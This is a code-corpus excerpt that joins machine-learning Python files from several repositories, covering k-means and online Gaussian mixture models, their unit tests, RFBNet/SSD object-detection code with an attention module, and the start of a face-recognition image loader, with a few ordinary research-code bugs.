% self.init)
def _initialize(self,points_data,points_test=None):
"""
This method initializes the Kmeans model by setting the values of
the means and the weights.
Parameters
----------
points_data : an array (n_points,dim)
Data on which the model is fitted.
points_test: an array (n_points,dim) | Optional
Data used to do early stopping (avoid overfitting)
"""
from .initializations import initialization_random
from .initializations import initialization_plus_plus
from .initializations import initialization_AF_KMC
n_points,dim = points_data.shape
#K-means++ initialization
if (self.init == "random"):
means = initialization_random(self.n_components,points_data)
self.means = means
self.log_weights = np.zeros(self.n_components) - np.log(self.n_components)
self.iter = 0
elif (self.init == "plus"):
means = initialization_plus_plus(self.n_components,points_data)
self.means = means
self.log_weights = np.zeros(self.n_components) - np.log(self.n_components)
self.iter = 0
elif (self.init == "AF_KMC"):
means = initialization_AF_KMC(self.n_components,points_data)
self.means = means
self.log_weights = np.zeros(self.n_components) - np.log(self.n_components)
self.iter = 0
elif (self.init == 'user'):
pass
else:
raise ValueError("Invalid value for 'initialization': %s "
"'initialization' should be in "
"['random', 'plus','AF_KMC']"
% self.init)
self._is_initialized = True
def _step_E(self,points):
"""
In this step the algorithm evaluates the responsibilities of each points in each cluster
Parameters
----------
points : an array (n_points,dim)
Returns
-------
resp: an array (n_points,n_components)
An array containing the hard assignements of each point.
If the point i belongs to the cluster j, the cell of the ith row
and the jth column contains 1, whereas the rest of the row is null.
"""
n_points,_ = points.shape
assignements = np.zeros((n_points,self.n_components))
M = dist_matrix(points,self.means)
for i in range(n_points):
index_min = np.argmin(M[i]) #the cluster number of the ith point is index_min
if (isinstance(index_min,np.int64)):
assignements[i][index_min] = 1
else: #Happens when two points are equally distant from a cluster mean
assignements[i][index_min[0]] = 1
return assignements
def _step_M(self,points,assignements):
"""
This method computes the new position of each means by minimizing the distortion
Parameters
----------
points : an array (n_points,dim)
assignements : an array (n_points,n_components)
an array containing the responsibilities of the clusters
"""
n_points,dim = points.shape
for i in range(self.n_components):
assignements_i = assignements[:,i:i+1]
n_set = np.sum(assignements_i)
idx_set,_ = np.where(assignements_i==1)
sets = points[idx_set]
if n_set > 0:
self.means[i] = np.asarray(np.sum(sets, axis=0)/n_set)
self.log_weights[i] = np.log(n_set + np.finfo(np.float64).eps)
def score(self,points,assignements=None):
"""
This method returns the distortion measurement at the end of the k_means.
Parameters
----------
points : an array (n_points,dim)
assignements : an array (n_points,n_components)
an array containing the responsibilities of the clusters
Returns
-------
distortion : (float)
"""
if assignements is None:
assignements = self.predict_assignements(points)
if self._is_initialized:
n_points,_ = points.shape
distortion = 0
for i in range(self.n_components):
assignements_i = assignements[:,i:i+1]
n_set = np.sum(assignements_i)
idx_set,_ = np.where(assignements_i==1)
sets = points[idx_set]
if n_set != 0:
M = dist_matrix(sets,self.means[i].reshape(1,-1))
distortion += np.sum(M)
return distortion
else:
raise Exception("The model is not initialized")
def fit(self,points_data,points_test=None,n_iter_max=100,
n_iter_fix=None,tol=0,saving=None,file_name='model',
saving_iter=2):
"""The k-means algorithm
Parameters
----------
points_data : array (n_points,dim)
A 2D array of points on which the model will be trained
tol : float, defaults to 0
The EM algorithm will stop when the difference between two steps
regarding the distortion is less or equal to tol.
n_iter_max : int, defaults to 100
number of iterations maximum that can be done
saving_iter : int | defaults 2
An int to know how often the model is saved (see saving below).
file_name : str | defaults model
The name of the file (including the path).
Other Parameters
----------------
points_test : array (n_points_bis,dim) | Optional
A 2D array of points on which the model will be tested.
n_iter_fix : int | Optional
If not None, the algorithm will exactly do the number of iterations
of n_iter_fix and stop.
saving : str | Optional
A string in ['log','linear']. In the following equations x is the parameter
saving_iter (see above).
* If 'log', the model will be saved for all iterations which verify :
log(iter)/log(x) is an int
* If 'linear' the model will be saved for all iterations which verify :
iter/x is an int
Returns
-------
None
"""
n_points,_ = points_data.shape
#Initialization
if not self._is_initialized or self.init!='user':
self._initialize(points_data,points_test)
self.iter = 0
if saving is not None:
f = h5py.File(file_name + '.h5', 'a')
grp = f.create_group('best' + str(self.iter))
self.write(grp)
f.close()
condition = _check_saving(saving,saving_iter)
early_stopping = points_test is not None
first_iter = True
resume_iter = True
dist_data, dist_test = 0,0
#K-means beginning
while resume_iter:
assignements_data = self._step_E(points_data)
dist_data_pre = dist_data
if early_stopping:
assignements_test = self._step_E(points_test)
dist_test_pre = dist_test
self._step_M(points_data,assignements_data)
dist_data = self.score(points_data,assignements_data)
if early_stopping:
dist_test = self.score(points_test,assignements_test)
self.iter+=1
# Computation of resume_iter
if n_iter_fix is not None:
resume_iter = self.iter < n_iter_fix
elif first_iter:
first_iter = False
elif self.iter > n_iter_max:
resume_iter = False
else:
if early_stopping:
criterion = (dist_test_pre - dist_test)/len(points_test)
else:
criterion = (dist_data_pre - dist_data)/n_points
resume_iter = (criterion > tol)
if not resume_iter and saving is not None:
f = h5py.File(file_name + '.h5', 'a')
grp = f.create_group('best' + str(self.iter))
self.write(grp)
f.close()
elif condition(self.iter):
f = h5py.File(file_name + '.h5', 'a')
grp = f.create_group('iter' + str(self.iter))
self.write(grp)
f.close()
def predict_assignements(self,points):
"""
This function return the hard assignements of points once the model is
fitted.
"""
if self._is_initialized:
assignements = self._step_E(points)
return assignements
else:
raise Exception("The model is not initialized")
def _get_parameters(self):
return (self.log_weights, self.means)
def _set_parameters(self, params,verbose=True):
self.log_weights, self.means = params
if self.n_components != len(self.means) and verbose:
print('The number of components changed')
self.n_components = len(self.means)
def _limiting_model(self,points):
n_points,dim = points.shape
log_resp = self.predict_log_resp(points)
_,n_components = log_resp.shape
exist = np.zeros(n_components)
for i in range(n_points):
for j in range(n_components):
if np.argmax(log_resp[i])==j:
exist[j] = 1
idx_existing = np.where(exist==1)
log_weights = self.log_weights[idx_existing]
means = self.means[idx_existing]
params = (log_weights, means)
return params
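# Minimal usage sketch (added for illustration; the import path is an assumption based on
# the package layout suggested above):
#   from megamix.batch import Kmeans
#   km = Kmeans(n_components=3, init='plus')
#   km.fit(points_data)                                   # points_data: array (n_points, dim)
#   labels = km.predict_assignements(points_data).argmax(axis=1)
#   print(km.score(points_data))                          # distortion of the fitted model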
```
#### File: megamix/online/GMM.py
```python
from .base import BaseMixture
from .base import _log_normal_matrix
from .base import cholupdate
from megamix.batch.initializations import initialization_plus_plus, initialization_k_means
from .kmeans import dist_matrix
import numpy as np
from scipy.special import logsumexp  # moved here from scipy.misc in newer SciPy releases
import scipy
class GaussianMixture(BaseMixture):
"""
Gaussian Mixture Model
Representation of a Gaussian mixture model probability distribution.
This class allows to estimate the parameters of a Gaussian mixture
distribution (with full covariance matrices only).
Parameters
----------
n_components : int, defaults to 1
Number of clusters used.
kappa : double, defaults to 1.0
A coefficient in ]0.0,1.0] which controls how much weight is given to new points
compared to the ones already used.
* If kappa is nearly null, the new points have a big weight and the model may take a lot of time to stabilize.
* If kappa = 1.0, the new points won't have a lot of weight and the model may not move enough from its initialization.
window : int, defaults to 1
The number of points used at the same time in order to update the
parameters.
update : bool, defaults to None
If True, the Cholesky factors of the covariance matrices are updated incrementally,
else they are recomputed at each iteration.
If None, the value is chosen automatically after initialization (True when window < dim).
reg_covar : float, defaults to 1e-6
In order to avoid null covariances this float is added to the diagonal
of covariance matrices.
Attributes
----------
name : str
The name of the method : 'GMM'
cov : array of floats (n_components,dim,dim)
Contains the computed covariance matrices of the mixture.
means : array of floats (n_components,dim)
Contains the computed means of the mixture.
log_weights : array of floats (n_components,)
Contains the logarithm of weights of each cluster.
iter : int
The number of iterations computed with the method fit()
Raises
------
ValueError : if the parameters are inconsistent, for example if the cluster number is negative, init_type is not in ['resp','mcw']...
References
----------
*Online but Accurate Inference for Latent Variable Models with Local Gibbs Sampling*, <NAME> & <NAME>
"""
def __init__(self, n_components=1,kappa=1.0,reg_covar=1e-6,
window=1,update=None):
super(GaussianMixture, self).__init__()
self.name = 'GMM'
self.n_components = n_components
self.covariance_type = 'full'
self.reg_covar = reg_covar
self.kappa = kappa
self.window = window
self.update = update
self.init = 'usual'
self._is_initialized = False
self.iter = 0
self._check_common_parameters()
self._check_parameters()
def _check_parameters(self):
if self.covariance_type not in ['full','spherical']:
raise ValueError("Invalid value for 'init': %s "
"'covariance_type' should be in "
"['full', 'spherical']"
% self.covariance_type)
if self.update not in [None, False, True]:
raise ValueError("update must be True or False. If not given, "
"the best value will be chosen after the initialisation")
def _initialize_cov(self,points):
n_points,dim = points.shape
assignements = np.zeros((n_points,self.n_components))
M = dist_matrix(points,self.means)
for i in range(n_points):
index_min = np.argmin(M[i]) #the cluster number of the ith point is index_min
if (isinstance(index_min,np.int64)):
assignements[i][index_min] = 1
else: #Happens when two points are equally distant from a cluster mean
assignements[i][index_min[0]] = 1
N = np.sum(assignements,axis=0) + 1e-15
N /= n_points
S = np.zeros((self.n_components,dim,dim))
for i in range(self.n_components):
diff = points - self.means[i]
diff_weighted = diff * assignements[:,i:i+1]
S[i] = np.dot(diff_weighted.T,diff)
S[i].flat[::dim+1] += self.reg_covar
S /= n_points
self.cov = S / N[:,np.newaxis,np.newaxis]
def _initialize_weights(self,points):
n_points,_ = points.shape
log_prob = _log_normal_matrix(points,self.means,self.cov_chol,
self.covariance_type,self.n_jobs)
log_prob_norm = logsumexp(log_prob, axis=1)
log_resp = log_prob - log_prob_norm[:,np.newaxis]
self.log_weights = logsumexp(log_resp,axis=0) - np.log(n_points)
def initialize(self,points,init_choice='plus',n_init=1):
"""
This method initializes the Gaussian Mixture by setting the values of
the means, covariances and weights.
Parameters
----------
points : an array (n_points,dim)
Data on which the model is initialized using the seeds of kmeans++.
"""
n_points,dim = points.shape
if self.init == 'usual':
dist_min = np.inf
for i in range(n_init):
if init_choice == 'plus':
means,dist = initialization_plus_plus(self.n_components,points,info=True)
elif init_choice == 'kmeans':
means,_,dist = initialization_k_means(self.n_components,points,info=True)
if dist < dist_min:
dist_min = dist
self.means = means
self.iter = n_points + 1
if self.init in ['usual','read_kmeans']:
self._initialize_cov(points)
# Computation of self.cov_chol
self.cov_chol = np.empty(self.cov.shape)
for i in range(self.n_components):
self.cov_chol[i],inf = scipy.linalg.lapack.dpotrf(self.cov[i],lower=True)
if self.init in ['usual','read_kmeans']:
self._initialize_weights(points)
weights = np.exp(self.log_weights)
self.N = weights
self.X = self.means * self.N[:,np.newaxis]
self.S = self.cov * self.N[:,np.newaxis,np.newaxis]
# Computation of S_chol if update=True
if self.update:
if self.covariance_type == 'full':
self.S_chol = np.empty(self.S.shape)
for i in range(self.n_components):
self.S_chol[i],inf = scipy.linalg.lapack.dpotrf(self.S[i],lower=True)
elif self.covariance_type == 'spherical':
self.S_chol = np.sqrt(self.S)
self._is_initialized = True
if self.update is None:
if self.window < dim:
self.update = True
else:
self.update = False
def _step_E(self, points):
"""
In this step the algorithm evaluates the responsibilities of each points in each cluster
Parameters
----------
points : an array (n_points,dim)
Returns
-------
log_resp: an array (n_points,n_components)
an array containing the logarithm of the responsibilities.
log_prob_norm : an array (n_points,)
logarithm of the probability of each sample in points
"""
log_normal_matrix = _log_normal_matrix(points,self.means,self.cov_chol,
self.covariance_type,self.n_jobs)
log_product = log_normal_matrix + self.log_weights
log_prob_norm = logsumexp(log_product,axis=1)
log_resp = log_product - log_prob_norm[:,np.newaxis]
return log_prob_norm,log_resp
def _step_M(self):
"""
In this step the algorithm updates the values of the parameters
(log_weights, means, covariances).
This method takes no arguments: it uses the sufficient statistics
(N, X and S) stored by _sufficient_statistics().
"""
self.log_weights = np.log(self.N)
self.means = self.X / self.N[:,np.newaxis]
self.cov = self.S / self.N[:,np.newaxis,np.newaxis]
if self.update:
self.cov_chol = self.S_chol/np.sqrt(self.N)[:,np.newaxis,np.newaxis]
else:
for i in range(self.n_components):
self.cov_chol[i],inf = scipy.linalg.lapack.dpotrf(self.cov[i],lower=True)
def _sufficient_statistics(self,points,log_resp):
"""
In this step computes the value of sufficient statistics (N,X and S)
given the responsibilities.
They will be used to update the parameters of the model.
Parameters
----------
points : an array (n_points,dim)
log_resp: an array (n_points,n_components)
an array containing the logarithm of the responsibilities.
"""
n_points,dim = points.shape
resp = np.exp(log_resp)
gamma = 1/((self.iter + n_points//2)**self.kappa)
# New sufficient statistics
N = resp.sum(axis=0) + 10 * np.finfo(resp.dtype).eps
N /= n_points
X = np.dot(resp.T,points)
X /= n_points
S = np.empty((self.n_components,dim,dim))
for i in range(self.n_components):
diff = points - self.means[i]
diff_weighted = diff * np.sqrt(resp[:,i:i+1])
S[i] = np.dot(diff_weighted.T,diff_weighted)
if self.update:
# diff_weighted is required in order to update cov_chol, so we begin
# its update here
u = np.sqrt(gamma/((1-gamma)*n_points)) * diff_weighted
for j in range(n_points):
cholupdate(self.S_chol[i],u[j])
S /= n_points
if self.update:
self.S_chol *= np.sqrt((1-gamma))
# Sufficient statistics update
self.N = (1-gamma)*self.N + gamma*N
self.X = (1-gamma)*self.X + gamma*X
self.S = (1-gamma)*self.S + gamma*S
def _convergence_criterion(self,points,_,log_prob_norm):
"""
Compute the log likelihood.
Parameters
----------
points : an array (n_points,dim)
log_prob_norm : an array (n_points,)
logarithm of the probability of each sample in points
Returns
-------
result : float
the log likelihood
"""
return np.sum(log_prob_norm)
def _get_parameters(self):
return (self.log_weights, self.means, self.cov)
def _set_parameters(self, params,verbose=True):
self.log_weights, self.means, self.cov = params
self.N = np.exp(self.log_weights)
self.X = self.means * self.N[:,np.newaxis]
self.S = self.cov * self.N[:,np.newaxis,np.newaxis]
for i in range(self.n_components):
self.cov_chol[i],inf = scipy.linalg.lapack.dpotrf(self.cov[i],lower=True)
if self.update:
self.S_chol[i],inf = scipy.linalg.lapack.dpotrf(self.S[i],lower=True)
def _limiting_model(self,points):
n_points,dim = points.shape
log_resp = self.predict_log_resp(points)
_,n_components = log_resp.shape
exist = np.zeros(n_components)
for i in range(n_points):
for j in range(n_components):
if np.argmax(log_resp[i])==j:
exist[j] = 1
idx_existing = np.where(exist==1)
log_weights = self.log_weights[idx_existing]
means = self.means[idx_existing]
cov = self.cov[idx_existing]
params = (log_weights, means, cov)
return params
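# Minimal usage sketch (added for illustration; fit() and predict_log_resp() are assumed to be
# provided by the inherited BaseMixture, as the calls in _limiting_model suggest):
#   gm = GaussianMixture(n_components=3, kappa=0.5, window=10)
#   gm.initialize(points[:500])        # seed means/covariances/weights on an initial chunk
#   gm.fit(points)                     # online updates, `window` points at a time
#   log_resp = gm.predict_log_resp(points)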
```
#### File: Stage_ENS/test/test_batch_base.py
```python
import numpy as np
from scipy import linalg
from numpy.testing import assert_almost_equal
from megamix.batch.base import _log_normal_matrix, _compute_precisions_chol
from megamix.batch.base import _full_covariance_matrices, _spherical_covariance_matrices
def generate_mixing_coefficients(n_components):
pi = np.abs(np.random.randn(n_components))
return pi/pi.sum()
def generate_covariance_matrices_full(n_components,n_features):
cov = np.empty((n_components,n_features,n_features))
for i in range(n_components):
X = np.random.randn(10*n_features,n_features)
cov[i] = np.dot(X.T,X)
return cov
def generate_resp(n_points,n_components):
resp = np.abs(np.random.randn(n_points,n_components))
return resp/resp.sum(axis=1)[:,np.newaxis]
def test_log_normal_matrix_full():
n_points, n_components, n_features = 10,5,2
points = np.random.randn(n_points,n_features)
means = np.random.randn(n_components,n_features)
cov = generate_covariance_matrices_full(n_components,n_features)
# Beginning of the test
log_det_cov = np.log(np.linalg.det(cov))
precisions = np.linalg.inv(cov)
log_prob = np.empty((n_points,n_components))
for i in range(n_components):
diff = points - means[i]
y = np.dot(diff,np.dot(precisions[i],diff.T))
log_prob[:,i] = np.diagonal(y)
expected_log_normal_matrix = -0.5 * (n_features * np.log(2*np.pi) +
log_prob + log_det_cov)
predicted_log_normal_matrix = _log_normal_matrix(points,means,cov,'full')
assert_almost_equal(expected_log_normal_matrix,predicted_log_normal_matrix)
def test_compute_precisions_chol_full():
n_components, n_features = 5,2
cov = generate_covariance_matrices_full(n_components,n_features)
expected_precisions_chol = np.empty((n_components,n_features,n_features))
for i in range(n_components):
cov_chol = linalg.cholesky(cov[i],lower=True)
expected_precisions_chol[i] = np.linalg.inv(cov_chol).T
predicted_precisions_chol = _compute_precisions_chol(cov,'full')
assert_almost_equal(expected_precisions_chol,predicted_precisions_chol)
def test_full_covariance_matrices():
n_points, n_components, n_features = 10,5,2
points = np.random.randn(n_points,n_features)
means = np.random.randn(n_components,n_features)
pi = generate_mixing_coefficients(n_components)
resp = generate_resp(n_points,n_components)
weights = pi * n_points
reg_covar = 1e-6
expected_full_covariance_matrices = np.empty((n_components,n_features,n_features))
for i in range(n_components):
diff = points - means[i]
diff_weighted = diff*resp[:,i:i+1]
cov = 1/weights[i] * np.dot(diff_weighted.T,diff)
cov.flat[::n_features+1] += reg_covar
expected_full_covariance_matrices[i] = cov
predicted_full_covariance_matrices = _full_covariance_matrices(points,means,weights,resp,reg_covar)
assert_almost_equal(expected_full_covariance_matrices,predicted_full_covariance_matrices)
def test_spherical_covariance_matrices():
n_points, n_components, n_features = 10,5,2
points = np.random.randn(n_points,n_features)
means = np.random.randn(n_components,n_features)
pi = generate_mixing_coefficients(n_components)
resp = generate_resp(n_points,n_components)
weights = pi * n_points
reg_covar = 1e-6
expected_full_covariance_matrices = np.empty(n_components)
for i in range(n_components):
diff = points - means[i]
diff_weighted = diff * resp[:,i:i+1]
product = diff * diff_weighted
expected_full_covariance_matrices[i] = np.sum(product)/weights[i] + reg_covar
expected_full_covariance_matrices /= n_features
predicted_spherical_covariance_matrices = _spherical_covariance_matrices(points,means,weights,resp,reg_covar)
assert_almost_equal(expected_full_covariance_matrices,predicted_spherical_covariance_matrices)
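# Added cross-check idea (illustrative): inside test_log_normal_matrix_full the expected
# matrix could also be validated against scipy.stats.multivariate_normal, which computes
# the same Gaussian log-density.
#   from scipy.stats import multivariate_normal
#   ref = np.stack([multivariate_normal(means[i], cov[i]).logpdf(points)
#                   for i in range(n_components)], axis=1)
#   assert_almost_equal(ref, _log_normal_matrix(points, means, cov, 'full'))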
``` |
{
"source": "14zwyan/RFBNet",
"score": 2
} |
#### File: layers/functions/refine_detection.py
```python
import torch
import torch.nn as nn
import torch.backends.cudnn as cudnn
from torch.autograd import Function
from torch.autograd import Variable
from utils.box_utils import decode
class RefineDetect(Function):
"""At test time, Detect is the final layer of SSD. Decode location preds,
apply non-maximum suppression to location predictions based on conf
scores and threshold to a top_k number of output predictions for both
confidence score and locations.
"""
def __init__(self, num_classes, bkg_label, cfg,obj_thresh=0.01):
self.num_classes = num_classes
self.background_label = bkg_label
self.variance = cfg['variance']
self.obj_thresh = obj_thresh
def forward(self, predictions, prior):
"""
Args:
loc_data: (tensor) Loc preds from loc layers
Shape: [batch,num_priors*4]
conf_data: (tensor) Shape: Conf preds from conf layers
Shape: [batch*num_priors,num_classes]
prior_data: (tensor) Prior boxes and variances from priorbox layers
Shape: [1,num_priors,4]
"""
loc, conf,obj = predictions
loc_data = loc.data
conf_data = conf.data
obj_data = obj.data
prior_data = prior.data
no_obj_index = obj_data[:,:,1] < self.obj_thresh
#print(conf_data.shape)
#print(no_obj_index.shape)
conf_data[ no_obj_index.unsqueeze(2).expand_as(conf_data)] = 0
num = loc_data.size(0) # batch size
self.num_priors = prior_data.size(0)
self.boxes = torch.zeros(1, self.num_priors, 4)
self.scores = torch.zeros(1, self.num_priors, self.num_classes)
self.obj = torch.zeros(1,self.num_priors,2)
if loc_data.is_cuda:
self.boxes = self.boxes.cuda()
self.scores = self.scores.cuda()
self.obj =self.obj.cuda()
if num == 1:
# size batch x num_classes x num_priors
conf_preds = conf_data.unsqueeze(0)
obj_preds = obj_data.unsqueeze(0)
else:
conf_preds = conf_data.view(num, self.num_priors,
self.num_classes)
obj_preds = obj_data.view(num, self.num_priors, 2)
self.boxes.expand_(num, self.num_priors, 4)
self.scores.expand_(num, self.num_priors, self.num_classes)
self.obj.expand_(num,self.num_priors,2)
# Decode predictions into bboxes.
for i in range(num):
decoded_boxes = decode(loc_data[i], prior_data, self.variance)
conf_scores = conf_preds[i].clone()
obj_scores = obj_preds[i].clone()
self.boxes[i] = decoded_boxes
self.scores[i] = conf_scores
self.obj[i] = obj_scores
return self.boxes, self.scores,self.obj
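# Illustrative call sketch (added; shapes follow the docstring above and are assumptions):
#   detector = RefineDetect(num_classes=21, bkg_label=0, cfg=cfg, obj_thresh=0.01)
#   boxes, scores, obj = detector.forward((loc, conf, obj_pred), priors)
#   # loc: (batch, num_priors, 4), conf: (batch, num_priors, num_classes),
#   # obj_pred: (batch, num_priors, 2), priors: (num_priors, 4)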
```
#### File: layers/modules/joint_attention_0812_v2.py
```python
import torch.nn as nn
import torch
from torch.nn import functional as F
from torch.autograd import Variable
from .se_module import SELayer
class ConvBlock(nn.Module):
def __init__(self,in_channel,out_channel,kernel_size,stride=1,padding=0):
super(ConvBlock,self).__init__()
self.conv = nn.Conv2d(in_channel,out_channel,kernel_size,stride=stride,padding=padding)
self.bn = nn.BatchNorm2d(out_channel)
def forward(self,x):
return F.relu( self.bn( self.conv(x) ) )
class Local_Global_Attention_Hybrid(nn.Module):
def __init__(self,in_channel,channel_chunck,channel_reduction):
super(Local_Global_Attention_Hybrid,self).__init__()
self.channel_reduction= channel_reduction
self.in_channel = in_channel
self.channel_chunck = channel_chunck
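# Added note: multiplying a one-element list replicates the same module instance, so every
# entry of self.ses (and of self.conv1s/self.conv2s below) shares its parameters; use a list
# comprehension such as [SELayer(...) for _ in range(n)] if independent weights per scale are intended.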
self.ses = nn.ModuleList([ SELayer(channel_chunck,channel_reduction) ] * ( in_channel//channel_chunck))
self.nlayers = in_channel // channel_chunck
self.global_attention_fc = nn.Sequential(
nn.Linear( self.nlayers, 1 ),
nn.ReLU(True),
nn.Linear( 1, self.nlayers)
)
self.global_pool = nn.AdaptiveAvgPool2d(1)
self.conv1s = nn.ModuleList( [ ConvBlock(1,1,3,stride=2,padding=1)]*self.nlayers )
self.conv2s = nn.ModuleList( [ ConvBlock(1,1,1)]*self.nlayers)
self.global_spatial_decoder = nn.Sequential(
ConvBlock(self.nlayers,1,1,1,0),
ConvBlock(1,self.nlayers,1,1,0)
)
def forward(self,x):
layers = list( torch.split(x,self.channel_chunck,dim=1) )
_,_,h,w = layers[0].size()
layers = list( map( lambda x,y : y(x) , layers, self.ses ) )
# all layers have been channel-attended; next, generate the scale descriptor
# based on the average of the attended features
scale_descriptor = torch.cat(list( map(lambda x : torch.mean(x,1,True), layers) ),dim=1)
#print('scale_descriptor shape:'+str(scale_descriptor.shape))
# c is supposed to be 3
b, c, h, w = scale_descripotr.size()
scale_weight = self.global_pool( scale_descriptor ).view(b,c)
scale_weight = self.global_attention_fc( scale_weight ).view(b,c,1,1)
#print('scale weight shape'+str(scale_weight.shape))
weight = list(torch.split( scale_weight,1,dim=1 ))
#print('weight shape',weight.shape)
layers = list( map( lambda x,y : x*y , layers,weight ))
#layers = torch.cat( layers,dim=1 )
#After channel wise attention, pixel wise attention
avg = list( map( lambda x : x.mean(1,keepdim=True) , layers ) )
avg = list( map( lambda x,y :y(x) , avg, self.conv1s))
avg = list( map( lambda x : F.upsample(x,(h,w),mode='bilinear'),avg) )
spatial_descriptor = torch.cat( list( map( lambda x,y : y(x) , avg ,self.conv2s )) ,dim=1)
spatial_descriptor = F.sigmoid( self.global_spatial_decoder( spatial_descriptor ) )
spatial_weights = list(torch.split( spatial_descriptor,1,dim=1 ))
layers = torch.cat( list( map( lambda x, y :x*y, layers, spatial_weights)) , dim=1)
return layers
if __name__ == '__main__':
a = torch.randn((2,32*3,8,8))
hierar_attention = Local_Global_Attention_Hybrid(32*3,32,16)
a= Variable(a)
a = hierar_attention(a)
state_dict = hierar_attention.state_dict()
for name, value in state_dict.items():
print(name)
print(a.shape)
```
#### File: 14zwyan/RFBNet/test_ssd_fusion_0901_v2.py
```python
from __future__ import print_function
import sys
import os
os.environ['CUDA_VISIBLE_DEVICES'] = "2"
import pickle
import argparse
import torch
import torch.nn as nn
import torch.backends.cudnn as cudnn
import torchvision.transforms as transforms
import numpy as np
from torch.autograd import Variable
from data import VOCroot,COCOroot
from data import AnnotationTransform, VOCDetection, BaseTransform, VOC_300,VOC_512
from ssd_fusion_0901_v2_E import build_ssd
import torch.utils.data as data
from layers.functions import Detect,PriorBox
from utils.nms_wrapper import nms
from utils.timer import Timer
parser = argparse.ArgumentParser(description='Receptive Field Block Net')
parser.add_argument('-v', '--version', default='RFB_vgg',
help='RFB_vgg ,RFB_E_vgg or RFB_mobile version.')
parser.add_argument('-s', '--size', default='300',
help='300 or 512 input size.')
parser.add_argument('-d', '--dataset', default='VOC',
help='VOC or COCO version')
parser.add_argument('-m', '--trained_model', default='weights/RFB300_80_5.pth',
type=str, help='Trained state_dict file path to open')
parser.add_argument('--save_folder', default='eval/', type=str,
help='Dir to save results')
parser.add_argument('--cuda', default=True, type=bool,
help='Use cuda to train model')
parser.add_argument('--cpu', default=False, type=bool,
help='Use cpu nms')
parser.add_argument('--retest', default=False, type=bool,
help='test cache results')
parser.add_argument('--device',type=int,help='cuda device')
args = parser.parse_args()
if not os.path.exists(args.save_folder):
os.mkdir(args.save_folder)
if args.dataset == 'VOC':
cfg = (VOC_300, VOC_512)[args.size == '512']
else:
cfg = (COCO_300, COCO_512)[args.size == '512']
priorbox = PriorBox(cfg)
priors =Variable(priorbox.forward(),volatile=True)
priors = priors.cuda()
def test_net(save_folder, net, detector, cuda, testset, transform, max_per_image=300, thresh=0.005,obj_thresh=0.01):
if not os.path.exists(save_folder):
os.mkdir(save_folder)
# dump predictions and assoc. ground truth to text file for now
num_images = len(testset)
num_classes = (21, 81)[args.dataset == 'COCO']
all_boxes = [[[] for _ in range(num_images)]
for _ in range(num_classes)]
_t = {'im_detect': Timer(), 'misc': Timer()}
det_file = os.path.join(save_folder, 'detections.pkl')
total_detect_time = 0
total_nms_time = 0
if args.retest:
f = open(det_file,'rb')
all_boxes = pickle.load(f)
print('Evaluating detections')
testset.evaluate_detections(all_boxes, save_folder)
return
for i in range(num_images):
img = testset.pull_image(i)
scale = torch.Tensor([img.shape[1], img.shape[0],
img.shape[1], img.shape[0]])
x =Variable( transform(img).unsqueeze(0),volatile=True)
if cuda:
x = x.cuda()
scale = scale.cuda()
_t['im_detect'].tic()
out = net(x) # forward pass
boxes, scores = detector.forward(out,priors)
detect_time = _t['im_detect'].toc()
boxes = boxes[0]
scores=scores[0]
boxes *= scale
boxes = boxes.cpu().numpy()
scores = scores.cpu().numpy()
# scale each detection back up to the image
total_detect_time += detect_time
if i == 0 :
total_detect_time -= detect_time
_t['misc'].tic()
for j in range(1, num_classes):
inds = np.where(scores[:, j] > thresh )[0]
if len(inds) == 0:
all_boxes[j][i] = np.empty([0, 5], dtype=np.float32)
continue
c_bboxes = boxes[inds]
c_scores = scores[inds, j]
c_dets = np.hstack((c_bboxes, c_scores[:, np.newaxis])).astype(
np.float32, copy=False)
keep = nms(c_dets, 0.45, force_cpu=args.cpu)
c_dets = c_dets[keep, :]
all_boxes[j][i] = c_dets
if max_per_image > 0:
image_scores = np.hstack([all_boxes[j][i][:, -1] for j in range(1,num_classes)])
if len(image_scores) > max_per_image:
image_thresh = np.sort(image_scores)[-max_per_image]
for j in range(1, num_classes):
keep = np.where(all_boxes[j][i][:, -1] >= image_thresh)[0]
all_boxes[j][i] = all_boxes[j][i][keep, :]
nms_time = _t['misc'].toc()
total_nms_time += nms_time
if i==0:
total_nms_time -= nms_time
if i % 20 == 0 and i !=0:
print('im_detect: {:d}/{:d} {:.3f}s {:.3f}s'
.format(i + 1, num_images, detect_time, nms_time))
print('detect:%4f nms: %4f fps:%4f %4f'%(total_detect_time,total_nms_time,
(i-1)/(total_nms_time+total_detect_time),(i-1)/total_detect_time))
_t['im_detect'].clear()
_t['misc'].clear()
with open(det_file, 'wb') as f:
pickle.dump(all_boxes, f, pickle.HIGHEST_PROTOCOL)
print('Evaluating detections')
testset.evaluate_detections(all_boxes, save_folder)
if __name__ == '__main__':
# load net
img_dim = (300,512)[args.size=='512']
num_classes = (21, 81)[args.dataset == 'COCO']
net = build_ssd('test', img_dim, num_classes) # initialize detector
state_dict = torch.load(args.trained_model,map_location = lambda storage,loc : storage)
# create new OrderedDict that does not contain `module.`
from collections import OrderedDict
new_state_dict = OrderedDict()
for k, v in state_dict.items():
head = k[:7]
if head == 'module.':
name = k[7:] # remove `module.`
else:
name = k
new_state_dict[name] = v
net.load_state_dict(new_state_dict)
net.eval()
print('Finished loading model!')
print(net)
# load data
if args.dataset == 'VOC':
testset = VOCDetection(
VOCroot, [('2007', 'test')], None, AnnotationTransform())
elif args.dataset == 'COCO':
testset = COCODetection(
COCOroot, [('2014', 'minival')], None)
#COCOroot, [('2015', 'test-dev')], None)
else:
print('Only VOC and COCO dataset are supported now!')
if args.cuda:
net = net.cuda()
cudnn.benchmark = True
else:
net = net.cpu()
# evaluation
#top_k = (300, 200)[args.dataset == 'COCO']
top_k = 200
detector = Detect(num_classes,0,cfg)
save_folder = os.path.join(args.save_folder,args.dataset)
rgb_means = ((104, 117, 123),(103.94,116.78,123.68))[args.version == 'RFB_mobile']
test_net(save_folder, net, detector, args.cuda, testset,
BaseTransform(net.size, rgb_means, (2, 0, 1)),
top_k, thresh=0.01)
``` |
{
"source": "150014739/Face_Recognition_Tensorflow",
"score": 3
} |
#### File: 150014739/Face_Recognition_Tensorflow/load_training_image.py
```python
import os
import glob
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
import numpy as np
import re
import cv2
class LoadTrainingImage:
def __init__(self, path, classes):
self.path = path;
self.classes = classes;
self.image_list = []
self.label_list = []
self.image_data = []
self.label_data = []
self.default_image_width = 28 #Default value;
self.default_image_height = 28 #Default value;
def print_path(self):
print(self.path);
print(self.image_list);
print(self.label_list);
print(self.image_data)
print(self.label_data)
print(self.default_image_width)
print(self.default_image_height)
print("Info: Printing finished.")
def next_batch(self, batch_size):
batch_data = [];
batch_target = [];
if (batch_size <= 0):
